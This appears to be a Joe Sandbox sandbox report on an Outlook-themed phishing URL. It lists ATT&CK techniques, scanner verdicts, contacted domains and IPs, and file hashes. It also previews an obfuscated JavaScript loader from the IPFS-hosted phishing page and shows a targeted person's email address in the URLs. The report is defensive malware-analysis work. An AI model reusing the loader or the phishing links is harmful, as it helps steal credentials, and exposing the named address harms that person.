          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Browser Extensions
          1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Registry Run Keys / Startup Folder
          1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==0%Avira URL Cloudsafe
          https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==100%SlashNextCredential Stealing type: Phishing & Social Engineering
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://wafsd.com/new/arsm/media/download.gif0%Avira URL Cloudsafe
          https://xsapz.com/ar/main.php0%Avira URL Cloudsafe
          https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/100%Avira URL Cloudmalware
          https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/owa/auth/15.0.1497/themes/resources/segoeui-semilight.ttf100%Avira URL Cloudmalware
          https://wafsd.com/new/arsm/media/download-logo.png0%Avira URL Cloudsafe
          https://wafsd.com/new/arsm/media/favicon.ico0%Avira URL Cloudsafe
          https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz#jacob100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          wafsd.com
          195.35.33.215
          truefalse
            high
            bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz
            146.190.178.79
            truetrue
              unknown
              xsapz.com
              66.29.153.55
              truefalse
                high
                www.google.com
                142.250.185.228
                truefalse
                  high
                  universidad-unidem.edu.mx
                  162.214.205.216
                  truetrue
                    unknown
                    i.ibb.co
                    91.134.9.160
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://i.ibb.co/5rThDVw/outlook.pngfalse
                        high
                        https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/owa/auth/15.0.1497/themes/resources/segoeui-semilight.ttffalse
                        • Avira URL Cloud: malware
                        unknown
                        https://wafsd.com/new/arsm/media/favicon.icofalse
                        • Avira URL Cloud: safe
                        unknown
                        https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==true
                          unknown
                          https://wafsd.com/new/arsm/media/download-logo.pngfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://wafsd.com/new/arsm/media/download.giffalse
                          • Avira URL Cloud: safe
                          unknown
                          https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comtrue
                            unknown
                            https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/false
                            • Avira URL Cloud: malware
                            unknown
                            https://xsapz.com/ar/main.phptrue
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz#jacobchromecache_70.1.drfalse
                            • Avira URL Cloud: malware
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            142.250.185.228
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            195.35.33.215
                            wafsd.comGermany
                            8359MTSRUfalse
                            162.214.205.216
                            universidad-unidem.edu.mxUnited States
                            46606UNIFIEDLAYER-AS-1UStrue
                            66.29.153.55
                            xsapz.comUnited States
                            19538ADVANTAGECOMUSfalse
                            91.134.9.160
                            i.ibb.coFrance
                            16276OVHFRfalse
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            146.190.178.79
                            bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyzUnited States
                            702UUNETUStrue
                            169.197.85.95
                            unknownUnited States
                            26548PUREVOLTAGE-INCUSfalse
                            IP
                            192.168.2.16
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1585507
                            Start date and time:2025-01-07 18:46:05 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 35s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                            Sample URL:https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:13
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal92.phis.troj.win@18/26@18/9
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.185.174, 64.233.184.84, 142.250.186.78, 216.58.212.174, 142.250.184.202, 142.250.185.234, 142.250.186.170, 172.217.18.106, 142.250.186.74, 216.58.212.138, 142.250.185.74, 142.250.186.138, 142.250.181.234, 216.58.206.74, 172.217.23.106, 142.250.185.170, 142.250.185.138, 216.58.206.42, 142.250.185.106, 142.250.185.202, 142.250.181.238, 142.250.185.142, 142.250.184.206, 142.250.185.206, 142.250.186.35, 142.250.185.238, 142.250.186.110, 172.217.18.14, 142.250.184.238, 23.56.254.164, 172.202.163.200, 4.175.87.197
                            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==
                            No simulations
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 16:46:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2673
                            Entropy (8bit):3.9913239815914094
                            Encrypted:false
                            SSDEEP:48:8rhd2TyeCHYidAKZdA1FehwiZUklqehBy+3:8ravduy
                            MD5:C49CAA1124E028199C5ACDB54ECDBFEC
                            SHA1:47AB76B0BDACE0CBF86AF759FC0D888AE825AFAC
                            SHA-256:1EE6C70272F11353D3B1F6916E924AE3526155CF158EBE927CE91AAC1ADADC38
                            SHA-512:E9ADE1BFF6A5DE5A5C93483D565BB9A4C971CDBE5B621BBDAD0346960B5126F0E5A7B2E0486745ABE30723050524400AA5DA8FB9A6D07D7B0B6A0CE386141FD5
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,.....z9.,a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 16:46:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2675
                            Entropy (8bit):4.004508506863196
                            Encrypted:false
                            SSDEEP:48:8Txd2TyeCHYidAKZdA1seh/iZUkAQkqehey+2:8TqvT9QHy
                            MD5:F533048B577DAD29921F13CAEA4803BE
                            SHA1:2CAE5C1DBE93B2F88B633B17F623BEA27C1B2859
                            SHA-256:1B292F97C80F5D6B09EE381285AE23183CA5AFDF69829E7629F5FD2150CAC2DE
                            SHA-512:799F7FC72061A003E9FB5AEBF5C187B5AA5C01F34B52CE6036DD6E0063A4E5796649592EF7506E45AE4B399F4C93FCF4E764F0B63583A6AF759A1960B71131FA
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,.....E-.,a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2689
                            Entropy (8bit):4.015322474039179
                            Encrypted:false
                            SSDEEP:48:8Wd2TyeAHYidAKZdA14meh7sFiZUkmgqeh7sEy+BX:8/vNnCy
                            MD5:D09CCD506BCAD3D1999A8EED7FB51EBE
                            SHA1:885261D3B620A7CCFFBF6C4FAE7D5F9029703CE9
                            SHA-256:C94BBBF6AADE3D856B6EFA8546BDA854E3D10626B158DE4B0C127346AE802419
                            SHA-512:54A02633FADCD924A2B5C298487A3E9D5C85A6355FE6B0AC7D90C4042365E962CE86FA422C917ED3CB6A8E024C410D6BDBF4D6203F7902E0E156BD0DED20E115
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 16:46:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2677
                            Entropy (8bit):4.002619749887509
                            Encrypted:false
                            SSDEEP:48:88d2TyeCHYidAKZdA1TehDiZUkwqeh6y+R:8Nvgcy
                            MD5:DBB8E45045D1589913DB78A6FFB8B631
                            SHA1:B8FF1486A825941DCAD9B57069967FC75AC06F11
                            SHA-256:4E369D5703B84E5FACC58F3C8641F6AB5140FBDF63CC2E4CF0EC540247990898
                            SHA-512:534C04CB149197E122845BDC6047EEB841EE9DB1564D6F23E7BDAA2149806141E474C148B9055009D97EDE58247FDAAA56EEA9312099976D0A6991B73619FD82
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,......'.,a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 16:46:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2677
                            Entropy (8bit):3.9919706409560116
                            Encrypted:false
                            SSDEEP:48:8Xd2TyeCHYidAKZdA1dehBiZUk1W1qehYy+C:8wvg94y
                            MD5:4A85F9696F281EE69FAE3607CBB4F46A
                            SHA1:9642DD1D358F9893E16F8A882C0DDBA60C36C498
                            SHA-256:6D7877410FC96EF22E22BAF5436CAA6971F24DA126A7D4F0DBC12FF62005F9C2
                            SHA-512:A67DB4FA8FA14BCD7D07EE6F605951ED9AF8F67891243BC311CF6D900EE4F1C0A1AFB765A423CC8306D845E6CD478339F687E576AA56A9E53D5D63B84F6F7309
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,......3.,a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 16:46:36 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2679
                            Entropy (8bit):4.0029206307326675
                            Encrypted:false
                            SSDEEP:48:8nd2TyeCHYidAKZdA1duTeehOuTbbiZUk5OjqehOuTbCy+yT+:8AvyTfTbxWOvTbCy7T
                            MD5:4B070CFBE8453810274C8AD163DDA2C9
                            SHA1:B563F660116AD8DA01707592CF37238BC1EF4C94
                            SHA-256:24D5E43547E1DDBAC192F2463E24A3671EC07D30DEC730CCF300AD461A16AD0E
                            SHA-512:81DBA7F0CFEA5444949E73F1137B6E13E12C9A7711AC1892D6D8DECF54B8B22ABF143649FF348B5AC81B80532A3DC59F70F5C4DBAC5003DD57CD75B74004797B
                            Malicious:false
                            Reputation:low
                            Preview:L..................F.@.. ...$+.,....5...,a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with very long lines (65498), with CRLF line terminators
                            Category:downloaded
                            Size (bytes):376602
                            Entropy (8bit):4.328095792286116
                            Encrypted:false
                            SSDEEP:1536:29poAkDjup71ljsp8Z2Ano5BUSyRTZv5BUNMrWHoIRQGz+rsEooc2CUN/Kib6F1r:wcpXyRTZGMo/F1NFhBis
                            MD5:2464AF498F689479F713C55A4C229BD8
                            SHA1:2CC569AD1B508307BD39DB68477B89F3B2098993
                            SHA-256:89DA393BE380EC3D46F38728294E8CB72C84E183A4D33F195518B94AB79EB035
                            SHA-512:89A16D601459763CC9B6E7B2AE658999BEC47DA83247AEC3E3A42ABE25BA756886C129C6F707B1B05D1BEA9C8E769F8E7937CEDC4C9CA702B254BAF11036CABC
                            Malicious:false
                            Reputation:low
                            URL:https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/
                            Preview:<script language="javascript">.. ..var _0x417f08=_0x3e80;(function(_0x12a42d,_0x102eb4){var _0x239bae=_0x3e80,_0x4b90d1=_0x12a42d();while(!![]){try{var _0x169ac3=-parseInt(_0x239bae(0x5ff))/(-0x158*0x7+-0x4d9+0x2*0x721)+parseInt(_0x239bae(0xe8d))/(-0x5ee+-0x1*-0x1a88+-0x2*0xa4c)+parseInt(_0x239bae(0x125e))/(-0x1*0x14f6+-0x231f*0x1+0x3818)+-parseInt(_0x239bae(0x59f))/(0x26a7+-0x13*-0x4d+0x656*-0x7)+parseInt(_0x239bae(0x7db))/(-0x9c2*-0x4+0x14ec+-0xe5*0x43)+parseInt(_0x239bae(0x1a60))/(-0x9f+-0x14e5+-0x2*-0xac5)*(-parseInt(_0x239bae(0x1a89))/(-0x1*-0x4ca+0xf6d*-0x2+0x1a17))+parseInt(_0x239bae(0x410))/(-0xb*-0x334+-0x1d71*0x1+0x5c3*-0x1);if(_0x169ac3===_0x102eb4)break;else _0x4b90d1['push'](_0x4b90d1['shift']());}catch(_0x341081){_0x4b90d1['push'](_0x4b90d1['shift']());}}}(_0x442c,0x39a5d+0x734da*-0x1+0xa3572),document[_0x417f08(0x5b9)](unescape(_0x417f08(0xfeb)+_0x417f08(0x23b)+_0x417f08(0x15f)+_0x417f08(0x1e9d)+_0x417f08(0x132)+_0x417f08(0x12e9)+_0x417f08(0xc12)+_0x417f08(0x1283)+_0x
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                            Category:downloaded
                            Size (bytes):7886
                            Entropy (8bit):3.5472733281483655
                            Encrypted:false
                            SSDEEP:48:g8KokgDQoxTP0Vh0jV/H2kPxL6GUEtcrCOmgfzQumtGCzYoITin0iarrWtwVWsiw:97DdTGhGW6yS7Kvs/WjiUKqWmNQOWY
                            MD5:759FADE9033AA298629E4B000DCD6DDE
                            SHA1:34A1ADF5C7326D7BDE5B5735471B5D81E611C189
                            SHA-256:CF0808A61EC571E0C4975663903B288009D55502AC0445D9948983B339A5CF6E
                            SHA-512:E96E93B13D70420D4D509D89A6337651440AE049B2A23D57C6250987003C46512C40C85C41BFA1C473A704801C961FFBE421522B89A1C34BA3B9E82A6D0769ED
                            Malicious:false
                            Reputation:low
                            URL:https://wafsd.com/new/arsm/media/favicon.ico
                            Preview:...... .... .....6......... ............... .h...f...(... ...@..... ..................................................................................................l.......................................................................................................o...o.6.n.f.m...m...l...l...................................................................................s.0.s.Z.r...q...p...o...o...n...m...m...l...l...........................................................w...v.K.v.x.u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v...v...u...u...t...s...s...r...q...p...o...o...n...m...m...l...l...........................................................w...v
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 128 x 108, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):2503
                            Entropy (8bit):7.493502863983718
                            Encrypted:false
                            SSDEEP:48:AitNn2VhPgvJ3Bpx/10LS+xvsSUptJ8ahxT7tE1zmklWHI39OnnIAFhO+qcdbgm:x2bsprHaitJJvczmZIinPnPTN
                            MD5:FB4DF93A98B7AF6880C126A8318A60A8
                            SHA1:282D061AECB8DDFBB2C78225FC7F0CD58D9FCE48
                            SHA-256:D9ED6586942003696AFE4E52B09F343F8342244B51A9E175B75162D7E615207B
                            SHA-512:1EE46AA063F3B54EAA0D688C72B5B60103D94664EAC52368C2EEDC76745E8371DFE99F24716D89216B13220251CC628AC3C3F58A863022FB9DC03868240DC615
                            Malicious:false
                            Reputation:low
                            Preview:.PNG........IHDR.......l........2....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:C0C46008F13E11E1B33EA30319DE7F11" xmpMM:DocumentID="xmp.did:C0C46009F13E11E1B33EA30319DE7F11"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C0C46006F13E11E1B33EA30319DE7F11" stRef:documentID="xmp.did:C0C46007F13E11E1B33EA30319DE7F11"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>j..4...=IDATx..]9r.F.m...>.`.."k. .j.....L...<.4.8......U....o .@.......n..~..k...?..5....Q...?C..r.r....A0......y..
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with no line terminators
                            Category:downloaded
                            Size (bytes):40
                            Entropy (8bit):4.439822782008755
                            Encrypted:false
                            SSDEEP:3:mSLinPbSsvVXyY:mSWPbScVXL
                            MD5:43E3F24D620D17E27253CC707F21F8A5
                            SHA1:65056BA10A4907DEA1D5B0C601ACF71AC23D7BFC
                            SHA-256:BB35BE02979B6BADD6DB473B6C54FAF85DB79FCE1BC727379F60E9C7CF9E0E58
